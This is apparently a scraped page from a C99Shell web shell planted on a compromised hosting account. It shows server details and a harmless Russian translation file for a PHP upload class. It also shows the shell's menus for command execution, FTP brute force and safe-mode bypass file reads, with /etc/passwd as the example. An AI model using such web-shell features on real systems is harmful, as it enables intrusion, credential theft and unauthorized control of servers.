!C99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/5.4.45 

uname -a: Linux webm115.cluster007.gra.hosting.ovh.net 5.15.74-ovh-vps-grsec-zfs-classid #1 SMP Wed
Oct 26 09:50:47 UTC 2022 x86_64
 

uid=763961(ebenisteaz) gid=100(users) groups=100(users) 

Safe-mode: OFF (not secure)

/home/ebenisteaz/www/admin/class/lang/   drwx---r-x
Free 0 B of 0 B (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class.upload.ru_RU.php (8.05 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// +------------------------------------------------------------------------+
// | class.upload.ru_RU.php                                                 |
// +------------------------------------------------------------------------+
// | Copyright (c) Chup 2007. All rights reserved.                          |
// | Version       0.25                                                     |
// | Last modified 24/11/2007                                               |
// | Email         chupzzz@ya.ru                                            |
// +------------------------------------------------------------------------+
// | This program is free software; you can redistribute it and/or modify   |
// | it under the terms of the GNU General Public License version 2 as      |
// | published by the Free Software Foundation.                             |
// |                                                                        |
// | This program is distributed in the hope that it will be useful,        |
// | but WITHOUT ANY WARRANTY; without even the implied warranty of         |
// | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the          |
// | GNU General Public License for more details.                           |
// |                                                                        |
// | You should have received a copy of the GNU General Public License      |
// | along with this program; if not, write to the                          |
// |   Free Software Foundation, Inc., 59 Temple Place, Suite 330,          |
// |   Boston, MA 02111-1307 USA                                            |
// |                                                                        |
// | Please give credit on sites that use class.upload and submit changes   |
// | of the script so other people can use them as well.                    |
// | This script is free to use, don't abuse.                               |
// +------------------------------------------------------------------------+

/**
 * Class upload Russian translation
 *
 * @version   0.25
 * @codepage  UTF-8 
 * @author    Chup (chupzzz@ya.ru)
 * @license   http://opensource.org/licenses/gpl-license.php GNU Public License
 * @copyright Free to change
 * @package   cmf
 * @subpackage external
 */

    
$translation = array();
    
$translation['file_error']                  = 'Файловая ошибка. Попробуйте еще раз.';
    
$translation['local_file_missing']          = 'Локальный файл не существует.';
    
$translation['local_file_not_readable']     = 'Локальный файл закрыт для чтения.';
    
$translation['uploaded_too_big_ini']        = 'Ошибка загрузки файла (загруженный файл превышает лимит директивы the upload_max_filesize из php.ini).';
    
$translation['uploaded_too_big_html']       = 'Ошибка загрузки файла (загруженный файл превышает лимит директивы MAX_FILE_SIZE определенной в HTML-форме).';
    
$translation['uploaded_partial']            = 'Ошибка загрузки файла (файл загружен частично).';
    
$translation['uploaded_missing']            = 'Ошибка загрузки файла (файл не был загружен).';
    
$translation['uploaded_unknown']            = 'Ошибка загрузки файла (неизвестный код ошибки).';
    
$translation['try_again']                   = 'Ошибка загрузки файла. Попробуйте еще раз.';
    
$translation['file_too_big']                = 'Файл очень большой.';
    
$translation['no_mime']                     = 'Невозможно определить MIME-тип файла.';
    
$translation['incorrect_file']              = 'Некорректный тип файла.';
    
$translation['image_too_wide']              = 'Изображение очень широкое.';
    
$translation['image_too_narrow']            = 'Изображение очень узкое.';
    
$translation['image_too_high']              = 'Изображение очень высокое.';
    
$translation['image_too_short']             = 'Изображение очень короткое.';
    
$translation['ratio_too_high']              = 'Соотношение сторон очень велико (изображение очень широкое).';
    
$translation['ratio_too_low']               = 'Соотношение сторон очень мало (изображение очень высокое).';
    
$translation['too_many_pixels']             = 'В изображении очень много пикселей.';
    
$translation['not_enough_pixels']           = 'В изображении недостаточно пикселей.';
    
$translation['file_not_uploaded']           = 'Файл не загружен. Невозможно продолжить процесс.';
    
$translation['already_exists']              = '%s существует. Измените имя файла.';
    
$translation['temp_file_missing']           = 'Некорректный временый файл. Невозможно продолжить процесс.';
    
$translation['source_missing']              = 'Некорректный загруженный файл. Невозможно продолжить процесс.';
    
$translation['destination_dir']             = 'Директория назначения не может быть создана. Невозможно продолжить процесс.';
    
$translation['destination_dir_missing']     = 'Директория назначения не существует. Невозможно продолжить процесс.';
    
$translation['destination_path_not_dir']    = 'Путь назначения не является директорией. Невозможно продолжить процесс.';
    
$translation['destination_dir_write']       = 'Директория назначения закрыта для записи. Невозможно продолжить процесс.';
    
$translation['destination_path_write']      = 'Путь назначения закрыт для записи. Невозможно продолжить процесс.';
    
$translation['temp_file']                   = 'Невозможно создать временный файл. Невозможно продолжить процесс.';
    
$translation['source_not_readable']         = 'Исходный файл нечитабельный. Невозможно продолжить процесс.';
    
$translation['no_create_support']           = 'Создание из %s не поддерживается.';
    
$translation['create_error']                = 'Ошибка создания %s изображения из оригинала.';
    
$translation['source_invalid']              = 'Невозможно прочитать исходный файл.';
    
$translation['gd_missing']                  = 'Библиотека GD не обнаружена.';
    
$translation['watermark_no_create_support'] = '%s не поддерживается, невозможно прочесть водный знак.';
    
$translation['watermark_create_error']      = '%s не поддерживается чтение, невозможно создать водный знак.';
    
$translation['watermark_invalid']           = 'Неизвестный формат изображения, невозможно прочесть водный знак.';
    
$translation['file_create']                 = '%s не поддерживается.';
    
$translation['no_conversion_type']          = 'Тип конверсии не указан.';
    
$translation['copy_failed']                 = 'Ошибка копирования файла на сервер. Команда copy() выполнена с ошибкой.';
    
$translation['reading_failed']              = 'Ошибка чтения файла.';   
        
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0071 ]--